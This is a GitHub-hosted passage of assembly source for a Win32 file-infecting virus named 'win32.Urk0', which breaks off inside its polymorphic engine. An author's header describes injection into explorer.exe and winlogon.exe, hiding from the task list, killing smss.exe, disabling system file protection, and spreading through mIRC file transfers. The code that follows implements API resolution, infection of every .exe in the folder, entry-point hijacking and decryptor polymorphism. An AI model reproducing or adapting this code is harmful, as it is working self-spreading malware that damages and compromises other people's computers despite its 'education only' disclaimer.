Permalink
Branch: master
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
3211 lines (2880 sloc) 81.7 KB
;THIS IS A VIRUS SOURCE CODE.NOW,THIS FILE ITS NOT DANGER.IM NOT RESPONSABLE OF DAMAGES
;IN CASE YOU COMPILE AND LINK IT TO CREATE A EXECUTABLE.THIS CODE IS ONLY FOR ENTERTAIMENT
;AND EDUCATION.
;I KNOW THIS CODE COULD TO HAVE (AND IM 99% SURE IT HAS) BUGS. I CODED IT ONLY FOR
;FUN, I NO WANT THIS VIRUS INFECTED COMPUTERS UNLESS YOU DID IT FOR UR ELECTION SO
;IM NOT REALLY WORRIED COZ THIS VIRUS IS NOT DONE FOR CORRUPT A SYSTEM.
;
;win32.Urk0 (Lady Marian 3)
;This is a Win32 virus.
;
;Win9x:
;It uses a method that i havent seen in other viruses.Second part of virus(where it
;polymorphs decryptor,infects,...) is descrypted and copied directly to other process
;that previously it creates(ill try it was a process created from a random file but for
;now it do it with explorer.exe) suspended.Then it unprotect mem of primary module of
;process with VirtualProtectEx and overwrite process mem with its code since entrypoint
;of new process.Then we reanude thread of created process so virus is executed in other
;process.This can be made MAX_DEPTH times.Explorer creates other process and inject there
;its code,and again and again and again...for MAX_DEPTH times.
;I think this difficults emulation and debugging.In addition if a
;memory monitor detects a virus behaviour in memory it detects virus as other file
;(for now explorer.exe).
;Note virus never infects explorer.exe in disk,only in memory,so if virus is searched in
;explorer.exe it is not found.In addition when i create new process i pass
;CREATE_NEW_PROCESS_GROUP flag so new process is created without father...
;suppostly there isnt relation between creator process and new process.
;In addition when virus is executing in explorer.exe it calls to RegisterServiceProcess
;so user doesnt see two explorer.exe in task list.
;With this method we return the control to host fastly becoz slow part of virus is executed
;currently with host becoz it is executing in explorer.exe where we are injected our code.
;First part of virus is encrypted.Decryptor is polimorphed.Key is changed with each generation.
;Polymorphic engine its not very complex.It interchanges registers used and inserts
;trash instructions.Trash uses recursively itself so we can find trash in this manner:
;
;xor reg32a,imm32a___
;add reg32b,imm32b_ |
;cli | |
;clc | |
;sub reg32b,imm32b_| |
;cli |
;cpuid |
;... |
;xor reg32a,imm32a___|
;...
;
;I wanna do it better with a v2.0 of the virus :P
;Second part is encrypted with random key.Decryptor its not poly.However,virus doesnt
;modify its code directly becoz it,while is injecting code to explorer.exe,is
;unencrypting bytes before injecting.
;It uses EPO method too.Insert a jmp(and ill insert some antidebugging trickz too)
;in entrypoint of infected file(later it restores bytes overwrited).
;Apis are gotten by CRC.
;For infection it adds itself at end of last section.Increase size of file infected.
;It only infects .exe files.
;For now Urk0 doesnt have payload(i dont know if i ll add it :-m )
;In addition Urk0 has two manners of infection.It can infect files with explorer code
;encrypted or withouth encrypting.If it isnt encrypted it have per-process characteristics.
;It works in the same manner but in addition it hooks CreateFileA api.
;It always infects mirc.exe file with per-process characteristics becoz mirc.exe use
;CreateFileA to open files that it will send(with dcc) so ill infect files before sending
;and in this manner virus will arrive other computer ;)(With mirc.exe and others similar).
;If you read this code you will see i have spend a lot of bytes that i could have not
;spend it,becoz for now i have not optimizated the code.I must optimizate it and
;optmizate poly engine.
;Structure of code:
;
; --------------------------------------SVirus
; -----------------------SCode
; (Entry point 2)
; Code executed
; after injecting
; in explorer.exe
; Encrypted with random.
; Note if this part is
; not encrypted some code
; here can be executed
; before injecting to
; explorer for
; perprocess propose
; -----------------------ECode
; (Entry point 1)
; Decryptor of code since
; Encrypted to EVirus
; -----------------------Encrypted
; Here it creates process
; explorer.exe and injects
; code(unencrypting SCode
; to ECode at same time it
; write each dword) to
; explorer.exe since entry
; point of it.When it has
; injected the code it reanude
; explorer and infection part
; and others important parts
; are executed in explorer.exe
; process.
; Later it restore for EPO
; overwrited bytes and jmp
; to host
; --------------------------------------EVirus
;
;WinNT:
;In NT machines virus works in a manner very different.In Nt,virus will try to get a
;handle to winlogon.exe with full privileges,using a flaw in dbgss implemented in smss.exe
;(you can see debploit flaw in august archives,Nt focus,www.securiteam.com).Using this flaw
;we inject our code in winlogon.Note that with this flaw we have a problem,when we try to get
;a handle to winlogon with debploit method,winlogon will terminate when our program
;terminate too,becouse our program set as debugger of winlogon,and winlogon as debuggee,
;so if we attach winlogon,when we terminate,it will terminate too.For this reason,winlogon
;code will kill smss.exe.Ok,this is a dramatic solution,however i think system will work
;very well without smss.exe.Smss.exe loads winlogon.exe and user mode part of win32 ss
;in memory,and when system hangs,it takes control and show typical blue screen.In addition,
;it have implemented dbgss so if we kill it,a lot of debugger will not run(mmm...is this a
;problem??? ;).I was working a lot of time in my system with smss.exe terminated and i think
;my system worked perfectly(i wasnt be able to use debuggers...only softice).
;well,when winlogon code kills smss.exe,it disables sfp with ratter and benny method(29a
;number 6).Later it gets a handle to explorer and injects the code there.In explorer,
;virus will infect current folder of explorer.exe in intervals of 60 seconds.
;Note virus use ModuleBase + 28h for infection mark.At this offset there are 5 reserved dwords
;in dos header.I think to put infection mark in this field is a few lame :P ... i could
;to have put it in second field of time date stamp or with others methods but im not worry
;for infection mark.
;
;
;and that is all :)
;
;
;SORRY BECOZ MY ENGLISH LEVEL ITS VERY LOW SO I M SORRY IF YOU DONT UNDERSTAND SOME
;EXPRESSIONS THAT I USE BADLY.HOWEVER ILL TRY TO WRITE BETTER I CAN :)
;
;I MUST TO APOLOGIZE TOO COZ MY BADLY MANNER OF PROGRAMMING. MY CODE IS NOT OPTIMIZED
;FOR FAST AND NOT OPTIMIZED FOR SIZE :P . IN ADDITION THIS IS A CRAZY CODE :S
;REALLY,IF I HAD TO READ IT I WOULD BE VERY ANGRY WITH THE AUTHOR :P COZ PERHAPS THE CODE
;IS NOT VERY MUCH UNDERSTANDABLE. SORRY .
;
;
;THX TO:
;
;OF COURSE: ¡ XEZAW ! My dear m3Nt0r - THX.exp 99 :) He shows with lot of pacience
;to this poor person (me) all i know. Ill never be able to pay u all u have done for me :)
;MsCorlib who always helps me too :) a half of this virus is your ;) You are other m3Nt0r
;for me. In addition u know all things that i ask u O_O u r a genius :)
;GriYo who always helps me too.Though not directly,you are a m3Nt0r for me too :) with
;your viruses.I love Dengue :),its a bible for me ;)
;Benny&Ratter,thx for that fantastic codes as Joss,ketamine,dob,all ratter's articles
;about windows, sfc disable :) and all all all ;) thx.
;My good friends VirusBust,ViR[-_-],isotope,Pato,Nightmare
;_HangMan_ & Oyzzo ;) my dear msdos lovers :D
;And all people in #asm,#win32asm,#win32,#ensamblador and #virus in irc hispano
;who helped me :)
;Well,i must put here a endless list of 'THX TO' becoz a lot of people have helped me,so
;ill only say thx all :*** and of course,if someone need me im here ;)
;And a infinitely 'THX TO' for LADY MARIAN: my Dark Angel,my Black Lotus,my Takhisys,
;my Queen Of Darkness,... :*******************************************************
;Who is Urko?
;Urko is a dog. Urko is one of my best friends. Urko is a fantastic dog becoz sometimes.....
;Urko SPEAKS! Urko is very timid and only speaks to me...and not always...urko only
;speaks when both,urko and me,we start to smoke that rare cigarretes that urko has. Then
;urko start to speak a lot of :) and we stay all night speaking,smoking and seeing films or
;playing trivial pursuit,or coding,or doing a lot of things :)
;Due this,i named this virus as win32.urk0 :)
.586p
.model flat,stdcall
extrn ExitProcess:proc
extrn GetLastError:proc
extrn GetTickCount:proc
extrn GetModuleHandleA:proc
extrn OpenProcess:proc
;macros
;;;;;;;;;;;;;;;;;;;;;;;
callz macro dir_call
db 0E8h
dd (dir_call - $ - 4)
endm
;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;
jmpz macro dir_call
db 0E9h
dd (dir_call - $ -4)
endm
;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;
CalcLenString macro
local loopin
push esi
dec esi
loopin:
inc esi
cmp byte ptr[esi],0
jne loopin
mov ecx,esi
pop esi
sub ecx,esi
endm
;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;
GezApi macro BaseKernel,ApiCRC,ApiNameLen
mov eax,BaseKernel
mov edx,ApiCRC
mov ebx,ApiNameLen
callz GetApi
endm
;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;
GezSyscall macro BaseNtdll,ApiCRC,ApiNameLen
GezApi BaseNtdll,ApiCRC,ApiNameLen
mov eax,[eax + 1]
endm
;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;
syscallz macro fc,paramz ;from Ratter's win2k.Joss
mov eax,fc
lea edx,[esp]
int 2eh
add esp,(paramz*4)
endm
;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;
Writez macro BaseKernel,hProcess,OffsetInProc,Buffer,Size
push 0
mov [esp],esp ;for storing number of writted bytes
push Size
push Buffer
push OffsetInProc
push hProcess
GezApi BaseKernel,WriteMemoryProcessCRC,WMPNameLen
call eax
endm
;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;
Readz macro BaseKernel,hProcess,OffsetInProc,Buffer,Size
push 0
mov [esp],esp ;for storing number of read bytes
push Size
push Buffer
push OffsetInProc
push hProcess
GezApi BaseKernel,ReadMemoryProcessCRC,RMPNameLen
call eax
endm
;;;;;;;;;;;;;;;;;;;;;;;
.data
;some datas for first generation
kernel32dll db 'kernel32.dll',0
auxi dd 0
az db 'Sleep',0
azz db 'ContinueDebugEvent',0
.code
start:
;vvvvvvvvvvvvvvvvvvvFIRST GENERATION CODE
jmpz jmpedSize
db '*Virus size'
virSize = EVirus - SVirus
db 0
dw virSize and 0FF00h
db virSize and 00FFh
db 0
jmpedSize:
;for getting apis crcs:
lea esi,az
CalcLenString
mov edi,ecx
call CRC32
lea esi,azz
CalcLenString
mov edi,ecx
call CRC32
;i unprotect code:
push offset kernel32dll
call GetModuleHandleA
push eax
mov esi,offset SVirus
mov ecx,EVirus - SVirus
xor ebx,ebx
callz UnprotectMem
pop eax
mov [kernel],eax
pushad
xor ebp,ebp
;ill test poly
callz Poly
mov eax,[CryptKey]
mov auxi,eax
popad
;I crypt necesary parts
call GetTickCount
or eax,0FFFF0000h
mov ecx,((ECode - SCode)/4)-1
inc ecx
Cryptit:
dec ecx
xor dword ptr [SCode + 4*ecx],eax
or ecx,ecx
jnz Cryptit
mov eax,auxi
callz DkRyPtIt_
DkRyPtIt_:
pop esi
add esi,Encrypted - DkRyPtIt_
mov ecx,((EVirus - Encrypted)/4)
GoGoGo_:
xor dword ptr [esi + ecx*4 - 4],eax
dec ecx
or ecx,ecx
jnz GoGoGo_
jmpz MyEntryPoint
;^^^^^^^^^^^^^^^^^^^FIRST GENERATION CODE
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;vvvvvvvvvvvvvvvvvvvSECOND GENERATION
SVirus:
;APIS NAMES CRCS AND LENGHTS
LoadLibraryACRC equ 3fc1bd8dh
LLNameLen equ 12
CloseHandleCRC equ 0b09315f4h
CHNameLen equ 11
FindFirstFileACRC equ 0c9ebd5ceh
FFFNameLen equ 14
FindNextFileACRC equ 75272948h
FNFNameLen equ 13
FindCloseCRC equ 0d82bf69ah
FCNameLen equ 9
GetTickCountCRC equ 5b4219f8h
GTCNameLen equ 12
WriteMemoryProcessCRC equ 4f58972eh
WMPNameLen equ 18
ReadMemoryProcessCRC equ 0f7c7ae42h
RMPNameLen equ 17
ResumeThreadCRC equ 3872beb9h
RTNameLen equ 12
ExitProcessCRC equ 251097CCh
EPNameLen equ 11
SetFileAttributesACRC equ 156b9702h
SFANameLen equ 18
CreateFileACRC equ 553b5c78h
CFNameLen equ 11
CreateFileMappingACRC equ 0b41b926ch
CFMNameLen equ 18
MapViewOfFileCRC equ 0A89b382fh
MVFNameLen equ 13
UnmapViewOfFileCRC equ 391ab6afh
UVFNameLen equ 15
SetFileTimeCRC equ 21804a03h
SFTNameLen equ 11
GetModuleHandleACRC equ 0B1866570h
GMHNameLen equ 16
GetLastErrorCRC equ 0d2e536b7h
GLENameLen equ 12
RegisterServiceProcessCRC equ 3b5ef61fh
RSPNameLen equ 22
SetCurrentDirectoryACRC equ 69b6849fh
SCDNameLen equ 20
GetCurrentDirectoryACRC equ 0c79dc4e3h
GCDNameLen equ 20
GetWindowsDirectoryACRC equ 0fff372beh
GWDNameLen equ 20
GetModuleFileNameACRC equ 08bff7a0h
GMFNameLen equ 18
CreateProcessACRC equ 0a851d916h
CPNameLen equ 14
Module32FirstCRC equ 38891c00h
M32FNameLen equ 13
Module32NextCRC equ 0f6911852h
M32NNameLen equ 12
CreateToolhelp32SnapShotCRC equ 0c1f3b876h
CT32SNameLen equ 24
VirtualProtectExCRC equ 5d180413h
VPNameLen equ 16
GetCurrentProcessCRC equ 0d0861aa4h
GCPNameLen equ 17
OpenProcessTokenCRC equ 0f9c60615h
OPTNameLen equ 16
LookupPrivilegeValueACRC equ 0da87bf62h
LPVNameLen equ 21
AdjustTokenPrivilegesCRC equ 0de3e5cfh
ATPNameLen equ 21
EnumProcessesCRC equ 0509a21ch
EPSNameLen equ 13
EnumProcessModulesCRC equ 0dea82ac2h
EPMNameLen equ 18
GetModuleInformationCRC equ 0f2a84636h
GMINameLen equ 20
SuspendThreadCRC equ 0bd76ac31h
STNameLen equ 13
FreeLibraryCRC equ 0da68238fh
FLNameLen equ 11
GetVersionCRC equ 4ccf1a0fh
GVNameLen equ 10
RasDialACRC equ 0b88da156h
RDNameLen equ 8
GetModuleBaseNameACRC equ 1720513eh
GMBNNameLen equ 18
OpenProcessCRC equ 0df27514bh
OPNameLen equ 11
ZwConnectPortCRC equ 0cbaec255h
ZCPNameLen equ 13
NtConnectPortCRC equ 0c88edce9h
NCPNameLen equ 13
ZwRequestPortCRC equ 0e28aebd1h
ZRPNameLen equ 13
DbgUiConnectToDbgCRC equ 09a51ac3ah
DUCTDNameLen equ 17
DbgSsInitializeCRC equ 0d198b351h
DSINameLen equ 15
DbgSsHandleKmApiMsgCRC equ 2e9c4e99h
DSHKAMNameLen equ 19
GetCurrentProcessIdCRC equ 1db413e3h
GCPINameLen equ 19
GetCurrentThreadIdCRC equ 8df87e63h
GCTINameLen equ 18
WaitForDebugEventCRC equ 96ab83a1h
WFDENameLen equ 17
ContinueDebugEventCRC equ 0d8e77e49h
CDENameLen equ 18
VirtualAllocExCRC equ 0e62e824dh
VANameLen equ 14
CreateRemoteThreadCRC equ 0ff808c10h
CRTNameLen equ 18
NtTerminateProcessCRC equ 94fcb0c0h
NTPNameLen equ 18
ExitThreadCRC equ 80af62e1h
ETNameLen equ 10
GetCurrentDirectoryWCRC equ 334971b2h
GCDWNameLen equ 20
FindFirstFileWCRC equ 3d3f609fh
FFFWNameLen equ 14
SleepCRC equ 0CEF2EDA8h
SNameLen equ 5
Kernel32CRC equ 204c64e5h ;CRC of 'kernel32' string
ERROR_NO_MORE_FILES equ 18
PAGE_EXECUTE_READWRITE equ 40h
MEM_COMMIT equ 00001000h
MEM_RESERVE equ 00002000h
STARTUPINFOSIZE equ 68
PROCESSINFORMATIONSIZE equ 16
CREATE_SUSPENDED equ 4
DEBUG_PROCESS equ 1
CREATE_NEW_PROCESS_GROUP equ 200h
TH32CS_SNAPMODULE equ 8
SNAPSHOT equ 16
;config constants
MAX_DEPTH equ 1 ;min depth,for now
INFECTION_PROBABILITY equ 8 ;values 0 - 7...if value > 7 always infects.If 0 never.
PER_PROCESS_PROBABILITY equ 8 ;values 0 - 7...if value > 7 never infects with per-process
;characteristic.If 0 always with per-process.
WORK_IN_NT equ 1 ;if WORK_IN_NT == 1,virus works in NT and try to do
;some specifics things for NT.If 0,virus exits if NT.
SCode:
;when we infect in memory the explorer process injecting our code the execution begins here
;This code is encrypted with random key each 4 bytes
callz d_offsetz ;first byte is E8000000h when uncrypted
d_offsetz:
pop ebp
sub ebp,offset d_offsetz
pop eax
push eax
xor ax,ax
add eax,1000h
;eax -> a part of kernel32
SearchKernelz:
sub eax,1000h
cmp word ptr [eax],'ZM'
jne SearchKernelz
mov [ebp + kernel],eax
;we set our process as service process.
push eax
GezApi eax,RegisterServiceProcessCRC,RSPNameLen
push 1
push 0
call eax
pop eax
;we will setup a SEH frame and if a error occurs nobody know it :D
lea esi,[ebp + ExplorerEnd]
push esi
push dword ptr fs:[0]
mov fs:[0],esp ;we set the SEH frame
;note its not necessary our handler
;restore SEH becoz we will terminate
;the process
;we repeat the process of injection of code in explorer MAX_DEPTH times.When we have loaded
;and infected explorer at MAX_DEPTH time then it's executed file infection zone.
;I think it will be more difficult for avs with this trap.
cmp dword ptr [ebp + ExplorerDepth],MAX_DEPTH
je Explorer2
add dword ptr [ebp + ExplorerDepth],1
callz InjectToExplorer
GezApi eax,ExitProcessCRC,EPNameLen
push 0
call eax
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;This code is executed in the last explorer.exe what we have injected our code
Explorer2:
;eax = Base of Kernel
;ebp = d_offset
mov dword ptr [ebp + ExplorerDepth],0 ;this is the last explorer injection
;now ill infect all files .exe in Current folder
callz InfectCurrentFolder
ExplorerEnd:
callz DoffEnd
DoffEnd:
pop ebp
sub ebp,offset DoffEnd
mov eax,[ebp + kernel]
;eax = kernel base
GezApi eax,ExitProcessCRC,EPNameLen
push 0
;eax -> ExitProcess
call eax
;;;;;;;;;;;;;;;;;;;;;;
kernel dd 0
CryptKey dd 0
ExplorerDepth dd 0
FILETIME struct
FT_dwLowDateTime dd ?
FT_dwHighDateTime dd ?
FILETIME ends
WIN32_FIND_DATA:
WFD_dwFileAttributes dd ?
WFD_ftCreationTime FILETIME <?>
WFD_ftLastAccessTime FILETIME <?>
WFD_ftLastWriteTime FILETIME <?>
WFD_nFileSizeHigh dd ?
WFD_nFileSizeLow dd ?
WFD_dwReserved0 dd ?
WFD_dwReserved1 dd ?
WFD_szFileName db 260 dup (?)
WFD_szAlternateFileName db 16 dup (?)
;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;
;InfectCurrentFolder infects files with mask in files variable in current folder
;in:
; none
;out:
; none
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
InfectCurrentFolder:
callz Poly ;we poly the decryptor overwriting code with new decryptor for
;the moment when we will infect a file
;here begins zone where we will infect files
;if all things are in order,current directory for memory-infected explorer
;is the same as file.exe that contains virus.
lea eax,[ebp + WIN32_FIND_DATA]
push eax
lea eax,[ebp + files]
push eax
mov eax,[ebp + kernel]
GezApi eax,FindFirstFileACRC,FFFNameLen
call eax
mov [ebp + SearchHand],eax
jmpz TestTypeOfInfection
MoreFiles: ;)
callz Poly ;poly again so each infected file will be different
lea eax,[ebp + WIN32_FIND_DATA]
push eax
push dword ptr [ebp + SearchHand]
mov eax,dword ptr [ebp + kernel]
GezApi eax,FindNextFileACRC,FNFNameLen
call eax
TestTypeOfInfection:
or eax,eax
je EndCurrentFolderInfection
mov eax,[ebp + kernel]
GezApi eax,GetTickCountCRC,GTCNameLen
call eax
and eax,7
cmp eax,INFECTION_PROBABILITY ;probability of infection.By default always.
jge MoreFiles
mov eax,[ebp + kernel]
GezApi eax,GetTickCountCRC,GTCNameLen
call eax
mov ecx,eax
mov ebx,eax
rol ebx,cl
and ebx,7
xor eax,eax
cmp ebx,PER_PROCESS_PROBABILITY ;probability of per-process.By default never.
jge WithPerProcess
inc eax
WithPerProcess:
push eax
callz TestFile
or eax,eax
jnz PerProcessOrNoInfect
pop eax
GoInfectIt:
callz InfectIt
jmpz MoreFiles
PerProcessOrNoInfect:
dec eax
or eax,eax
jz ForcePerProcess
;if no force perprocess and no normal,then -1 and no infect so more files
pop eax
jmpz MoreFiles
ForcePerProcess:
pop ebx
jmpz GoInfectIt
EndCurrentFolderInfection:
ret
;;;;;;;;;;;;;;;;;;;;;;;;
files db '*.exe',0
SearchHand dd 0
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;
;InfectIt uses WIN_FIND_DATA for infecting file which information is contained in that struc
;in:
; eax = 0 without encryption(but with perprocess enable) eax = 1 with encryption(but
; no enabled perprocess)
;out:
; none
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
InfectIt:
mov [ebp + Encryption],eax
pushad
callz MapFile
or eax,eax
jz EndInfection
mov eax,[ebp + WFD_nFileSizeLow]
add eax,EVirus - SVirus
mov [ebp + FileInfectedSize],eax
mov ebx,[ebp + ViewHandle]
cmp word ptr [ebx],'ZM'
jne CloseAndBye
cmp word ptr [ebx + 8],4h
jne CloseAndBye
mov edi,[ebx + 3ch]
add edi,ebx
cmp word ptr [edi],'EP'
jne CloseAndBye
cmp word ptr [ebx + 28h],'Zv';my infection mark
je CloseAndBye
mov ax,[edi + 16h]
test ax,2 ;yes IMAGE_FILE_EXECUTABLE_IMAGE
je CloseAndBye
test ax,1000h ;no IMAGE_FILE_SYSTEM
jne CloseAndBye
test ax,2000h ;no IMAGE_FILE_DLL
jne CloseAndBye
mov ax,[edi + 5ch]
test ax,1 ;no IMAGE_SUBSYSTEM_NATIVE
jne CloseAndBye
;we have a file executable in PE format and not infected by this virus so ill continue
;with infection.In addition is not a system file.
mov edi,dword ptr [edi + 3ch];file alingment
mov dword ptr [ebp + FileAlignment],edi
AlignSize:
mov eax,[ebp + FileInfectedSize]
xor edx,edx
div edi
inc eax
;we divide size/alignment and inc result for knowing the new number of blocks
;and next we multiplicate number of blocks x size of block
mul edi
mov [ebp + WFD_nFileSizeLow],eax ;for in next mapping will be mapped file size + space for vir
callz CloseAll
callz MapFile ;with size to allocate virus
or eax,eax
jz EndInfection
;now we have file mapped with enought space at end of file to append there our virus ;)
mov ebx,[ebp + ViewHandle]
mov word ptr [ebx + 28h],'Zv';infection mark
mov eax,[ebx + 3ch];lfanew
add ebx,eax;ebx -> PE
mov eax,[ebx + 28h]
mov [ebp + OldEntryPoint],eax
xor eax,eax
mov ax,[ebx + 6];number of sections
mov [ebp + Sections],eax
xor eax,eax
mov ax,word ptr [ebx + 14h]
add ebx,18h
add ebx,eax
mov ecx,[ebp + Sections]
dec ecx
mov [ebp + FirstSection],ebx
LastSection:
add ebx,28h
loop LastSection
;we have ebx -> last section
mov [ebx + 24h],0A0000020h ;section is executable,readable,writable and with code
mov eax,[ebx + 10h];size of raw data
add eax,[ebx + 0ch];add size + RVA of section.
add eax,MyEntryPoint - SVirus
;eax = New Entry Point
sub eax,dword ptr [ebp + OldEntryPoint]
sub eax,EPOCodeSize
mov [ebp + EPOrel32],eax
mov eax,[ebx + 10h];size of raw data
add eax,[ebx + 14h];add size + pointer to raw data of section.We are in the end of last section
;We must copy there our code ;)
mov [ebp + EndLastSection],eax
mov esi,ebx
;now we must alignment section
mov eax,[esi + 10h];size of raw
add eax,EVirus - SVirus
mov edi,[ebp + FileAlignment]
xor edx,edx
div edi
inc eax
mul edi
mov [esi + 10h],eax;new sizeofrawdata
mov [esi + 8],eax;new VirtualSize
add eax,dword ptr [esi + 0ch];size + virtual address
mov ebx,[ebp + ViewHandle]
mov ecx,[ebx + 3ch];lfanew
add ebx,ecx;ebx -> PE
mov [ebx + 50h],eax;new size of image
EPOzone:
;well,we have modified executable for introducting our code.Here we can modify
;entry point for pointing to our code but i think EPO methods its more efective.
;first all i must search the entry point,but no when file is executing,i must search
;raw entry point,entry point in file.There i must copy EPOCode.
mov ecx,[ebp + Sections]
mov ebx,[ebp + FirstSection]
mov esi,[ebp + OldEntryPoint]
FindCodeSec:
mov eax,[ebx + 0ch]
add eax,[ebx + 10h];eax -> end of this section
cmp eax,esi
jg FoundCodeSec
add ebx,28h
loop FindCodeSec
FoundCodeSec:
;ebx ->header of section with entry point
sub esi,dword ptr [ebx + 0ch]
add esi,dword ptr [ebx + 14h];raw_e_point = e_point - VASection + PointerToRawDataSection
mov [ebp + OldRawEntryPoint],esi
add esi,[ebp + ViewHandle]
push esi
lea edi,[ebp + EPORestoreBytes]
mov ecx,EPOCodeSize
push ecx
rep movsb
pop ecx
pop esi
lea edi,[ebp + SEPOCode]
xchg esi,edi
rep movsb
;now we have copied bytes for EPO to entrypoint and old bytes to EPORestoreBytes for
;restoring when we return to host
;now we must copy virus code (encrypting necesary parts) to EndLastSection
mov edi,[ebp + EndLastSection]
add edi,dword ptr [ebp + ViewHandle]
push edi
lea esi,[ebp + SVirus]
mov ecx,EVirus - SVirus
rep movsb
mov eax,[ebp + kernel]
GezApi eax,GetTickCountCRC,GTCNameLen
call eax
pop edi
or eax,0FFFF0000h
cmp dword ptr [ebp + Encryption],0
jne YesEncrypt
xor eax,eax
YesEncrypt:
mov ecx,((ECode - SCode)/4)-1
inc ecx
CryptitExplorerCode:
dec ecx
xor dword ptr [edi + 4*ecx],eax
or ecx,ecx
jnz CryptitExplorerCode
add edi,Encrypted - SCode
mov eax,[ebp + CryptKey]
mov ecx,((EVirus - Encrypted)/4)-1
inc ecx
CryptitFirstCode:
dec ecx
xor dword ptr [edi + 4*ecx],eax
or ecx,ecx
jnz CryptitFirstCode
CloseAndBye:
callz CloseAll
EndInfection:
popad
ret
;;;;;;;;;;;;;;;;;;;;;;
FileHandle dd 0
MappingHandle dd 0
ViewHandle dd 0
FileInfectedSize dd 0
FileAlignment dd 0
Sections dd 0
FirstSection dd 0
EndLastSection dd 0
OldRawEntryPoint dd 0
Encryption dd 0
;;;;;;;;;;;;;;;;;;;;;;;;
SEPOCode:
db 0E9h ;rel jmp to our code
EPOrel32 dd 0
EEPOCode:
EPOCodeSize equ EEPOCode - SEPOCode
;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;
MapFile: ;it maps the file in WIN32_FIND_DATA
ChangeAttributesOfFile:
lea edi,[ebp + WFD_szFileName]
push 80h
push edi
mov eax,[ebp + kernel]
GezApi eax,SetFileAttributesACRC,SFANameLen
call eax
push 0
push 0
push 3
push 0
push 1
push 0C0000000h ;read and write access to file
lea eax,[ebp + WFD_szFileName]
push eax
mov eax,[ebp + kernel]
GezApi eax,CreateFileACRC,CFNameLen
call eax
inc eax
or eax,eax
jnz np1
ret
np1:
dec eax
mov [ebp + FileHandle],eax
push 0
mov eax,[ebp + WFD_nFileSizeLow]
push eax
push 0
push 4
push 0
push dword ptr [ebp + FileHandle]
mov eax,[ebp + kernel]
GezApi eax,CreateFileMappingACRC,CFMNameLen
call eax
or eax,eax
jz CloseFile
mov [ebp + MappingHandle],eax
push dword ptr [ebp + WFD_nFileSizeLow]
push 0
push 0
push 000F001Fh
push eax
mov eax,[ebp + kernel]
GezApi eax,MapViewOfFileCRC,MVFNameLen
call eax
or eax,eax
jz CloseMapping
mov [ebp + ViewHandle],eax
ret
;;;;;;;;;;;;;;;;;;;;;;
CloseAll:;close file opened with MapFile
push eax
mov eax,[ebp + kernel]
GezApi eax,UnmapViewOfFileCRC,UVFNameLen
push dword ptr [ebp + ViewHandle]
call eax
pop eax
CloseMapping:
push eax
mov eax,[ebp + kernel]
GezApi eax,CloseHandleCRC,CHNameLen
push dword ptr [ebp + MappingHandle]
call eax
pop eax
CloseFile:
RestoreAttributes:
push eax
lea eax,dword ptr [ebp + WFD_ftLastWriteTime]
push eax
lea eax,dword ptr [ebp + WFD_ftLastAccessTime]
push eax
lea eax,dword ptr [ebp + WFD_ftCreationTime]
push eax
push dword ptr [ebp + FileHandle]
mov eax,[ebp + kernel]
GezApi eax,SetFileTimeCRC,SFTNameLen
call eax
mov eax,[ebp + kernel]
GezApi eax,CloseHandleCRC,CHNameLen
push dword ptr [ebp + FileHandle]
call eax
pop eax
ret
;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;
;Poly creates a decryptor rutine overwriting code since MyEntryPoint to Encrypted
;
;in:
; none
;out:
; none
;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
Poly:
pushad
mov eax,[ebp + kernel]
GezApi eax,GetTickCountCRC,GTCNameLen
call eax
mov [ebp + CryptKey],eax
lea edi,[ebp + MyEntryPoint]
mov ecx,eax
and ecx,0000003Fh
push eax;random
and eax,00000007h
cmp al,4
jne noesp1
inc eax
noesp1:
mov [ebp + esireg],eax
pop eax;random
push eax
ror eax,4
and eax,00000007h
cmp al,4
jne noesp2
inc eax
noesp2:
cmp eax,dword ptr [ebp + esireg]
jne nosame
inc eax
cmp al,4
jne nosame
inc eax
nosame:
and al,7
mov [ebp + ecxreg],eax
mov byte ptr [edi],0E8h
inc edi
